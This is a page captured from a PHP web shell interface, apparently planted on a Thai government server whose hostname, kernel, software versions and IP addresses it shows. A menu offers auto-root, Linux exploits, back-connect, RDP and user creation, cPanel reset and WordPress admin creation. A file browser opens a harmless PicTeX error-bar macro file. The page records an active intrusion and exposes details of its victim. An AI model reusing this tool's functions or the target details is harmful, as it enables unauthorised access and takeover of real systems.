Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
texmf /
tex /
generic /
pictex /
[ HOME SHELL ]
Name
Size
Permission
Action
errorbars.tex
2.97
KB
-rw-r--r--
latexpicobjs.tex
10.27
KB
-rw-r--r--
piccorr.sty
4.5
KB
-rw-r--r--
picmore.tex
2.81
KB
-rw-r--r--
pictex.sty
294
B
-rw-r--r--
pictex.tex
126.67
KB
-rw-r--r--
pictexwd.sty
397
B
-rw-r--r--
pictexwd.tex
126.52
KB
-rw-r--r--
pointers.tex
1.29
KB
-rw-r--r--
postpictex.tex
1.37
KB
-rw-r--r--
prepictex.tex
1.06
KB
-rw-r--r--
texpictex.tex
7.1
KB
-rw-r--r--
tree.sty
11.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : errorbars.tex
% % TeX macros to plot error bars with the PicTeX macros. % % These macros are largely derived from the examples in the back % of the PiCTeX manual. % % To plot with a mark at each data point, simply say % % \plotWith mark M at x1 y1 x2 y2 .... xN yN / % % where "M" is a mark character {e.g. $\bullet$} % % To include error bars in the plot, say: % % \plotWithErrorBars mark M at % x1 y1 e1 % x2 y2 e2 .... xN yN eN % / % % The line-breaking isn't needed. Marks are placed on the graph % at (xi, yi) for each data point. Vertical error bars are drawn % from (xi, yi + ei) to (xi, yi - ei). % % The cross-bar at the top and bottom of the error bars is normally % 5 pts, but can be changed by setting the \crossbarlength dimen. % % % Dirk Grunwald Apr 20 1988 % % \newdimen\dyposition \newdimen\crossbarlength \crossbarlength=5pt \newdimen\lastPlotX \newdimen\lastPlotY \newdimen\tmpPlotX \newdimen\tmpPlotY % % \def\plotErrorBar#1 #2 #3 #4{% \message{ Plot #4 at #1 #2 }% \put {#4} at {#1} {#2} \dyposition=\Ydistance{#3} \put{% \vbox{% \hsize=\crossbarlength% \hrule height \linethickness% \vskip -.5\linethickness% \centerline{\vrule width \linethickness height 2\dyposition}% \nointerlineskip% \vskip -.5\linethickness% \hrule height \linethickness}% } at {#1} {#2} } % \def\plotWithErrorBars mark #1 at #2 #3 #4 {% \def\errorBarMark{#1}% % % plot first point % \plotErrorBar {#2} {#3} {#4} {\errorBarMark} \lastPlotX=\Xdistance{#2}% \lastPlotY=\Ydistance{#3}% \futurelet\nextcharacter\plotErrorBarLoop} % \def\plotErrorBarLoop{% \if/\nextcharacter% \def\plotErrorBarAction{\plotErrorBarFinish}% \else% \def\plotErrorBarAction{\plotErrorBarContinued}% \fi% \plotErrorBarAction} % \def\plotErrorBarFinish/ {} % \def\plotErrorBarContinued#1 #2 #3 {% \plotErrorBar {#1} {#2} {#3} {\errorBarMark}% \tmpPlotX = \Xdistance{#1}% \tmpPlotY = \Ydistance{#2}% \setdimensionmode% \plot {\lastPlotX} {\lastPlotY} {\tmpPlotX} {\tmpPlotY} / \setcoordinatemode% \lastPlotX = \tmpPlotX% \lastPlotY = \tmpPlotY% \futurelet\nextcharacter\plotErrorBarLoop} % \def\plotWith mark #1 at #2 #3 {% \def\plotWithMark{#1}% % % plot first point % \message{Plot {\plotWithMark} at #2 #3}% \put {\plotWithMark} at {#2} {#3} \lastPlotX=\Xdistance{#2}% \lastPlotY=\Ydistance{#3}% \futurelet\nextcharacter\plotWithLoop} % \def\plotWithLoop{% \if/\nextcharacter% \def\plotWithAction{\plotWithFinish}% \else% \def\plotWithAction{\plotWithContinued}% \fi% \plotWithAction} % \def\plotWithFinish/ {} % \def\plotWithContinued#1 #2 {% \message{ Plot {\plotWithMark} at #1 #2}% \put {\plotWithMark} at {#1} {#2} \tmpPlotX = \Xdistance{#1}% \tmpPlotY = \Ydistance{#2}% \setdimensionmode% \plot {\lastPlotX} {\lastPlotY} {\tmpPlotX} {\tmpPlotY} / \setcoordinatemode% \lastPlotX = \tmpPlotX% \lastPlotY = \tmpPlotY% \futurelet\nextcharacter\plotWithLoop}
Close